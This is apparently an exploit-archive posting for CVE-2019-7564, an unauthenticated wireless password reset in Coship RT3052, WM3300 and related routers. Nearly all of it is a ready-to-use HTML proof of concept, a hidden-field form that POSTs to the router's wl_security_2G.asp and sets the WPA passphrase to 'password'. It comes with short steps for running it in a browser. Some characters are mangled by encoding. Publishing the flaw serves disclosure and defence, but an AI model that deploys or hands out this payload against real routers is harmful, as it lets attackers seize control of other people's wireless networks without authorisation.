Coship Wireless Router 4.0.0.x / 5.0.0.x Authentication Bypass

Coship Wireless Router versions 4.0.0.x and 5.0.0.x suffer from an unauthenticated password reset vulnerability.

MD5 | 7aa038c01e26688a3e7f777d76482682

# Exploit Title: Coship Wireless Router a Wireless SSID Unauthenticated Password Reset
# Date: 07.02.2019
# Exploit Author: Adithyan AK
# Vendor Homepage:
# Category: Hardware (WiFi Router)
# Affected Versions *: *Coship RT3052 -, Coship RT3050 -, Coship WM3300 -, Coship WM3300 -, Coship RT7620 -
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-7564

#POC :

# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on aSubmit requesta
# The password of the Wireless SSID will be changed to "password"

<script>history.pushState('', '', '/')</script>
<form action="http://X.X.X.X/regx/wireless/wl_security_2G.asp
<http://router-ip/regx/wireless/wl_security_2G.asp>" method="POST">
<input type="hidden" name="wl_wep" value="disabled" />
<input type="hidden" name="wl_auth_mode" value="none" />
<input type="hidden" name="page" value="wl_security_2G.asp" />
<input type="hidden" name="wl_unit" value="0" />
<input type="hidden" name="action" value="Apply" />
<input type="hidden" name="wl_auth" value="0" />
<input type="hidden" name="wl_akm" value="psk psk2" />
<input type="hidden" name="wl_crypto" value="tkip+aes" />
<input type="hidden" name="wl_wpa_gtk_rekey" value="0" />
<input type="hidden" name="wl_wpa_psk" value="password" />
<input type="submit" value="Submit request" />

Related Posts